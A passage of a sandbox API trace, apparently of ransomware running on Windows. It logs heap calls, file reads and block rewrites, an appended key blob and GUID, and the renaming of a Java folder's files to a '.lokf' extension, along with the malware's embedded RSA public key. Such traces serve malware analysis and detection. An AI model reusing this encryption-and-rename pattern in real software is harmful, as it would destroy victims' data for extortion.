(hHash=0x327cb80) returned 1 [0061.353] CryptReleaseContext (hProv=0x6b88b8, dwFlags=0x0) returned 1 [0061.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.353] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.353] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.353] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25810) returned 0x9c8dae8 [0061.354] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86e78 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862b0 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86ec0 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862c8 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862f8 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86310 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.354] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862f8 | out: hHeap=0x660000) returned 1 [0061.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86310 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c862f8 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862f8 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.355] GetCurrentThreadId () returned 0x9e0 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c910 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b88b8 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.356] GetCurrentThreadId () returned 0x9e0 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862f8 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86310 [0061.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c862e0 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86328 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862f8 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c862f8 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245620 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.357] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862f8 | out: hHeap=0x660000) returned 1 [0061.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245620 | out: hHeap=0x660000) returned 1 [0061.358] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fb18 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b88b8 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fb18 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86328 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86310 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862e0 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c862c8 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86ec0 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.358] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.359] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x25800, lpOverlapped=0x0) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0061.359] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x182ac2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.359] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f6f8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f6f8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.360] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.360] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.360] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.360] CloseHandle (hObject=0x5cc) returned 1 [0061.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0061.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0061.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.360] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.lokf")) returned 1 [0061.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.361] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.361] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.362] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0061.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.362] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.362] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0061.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.363] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=906752) returned 1 [0061.363] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.365] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.365] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.367] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.367] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x25805, lpOverlapped=0x0) returned 1 [0061.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.369] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.369] lstrlenA (lpString="-----BEGIN PUBLIC 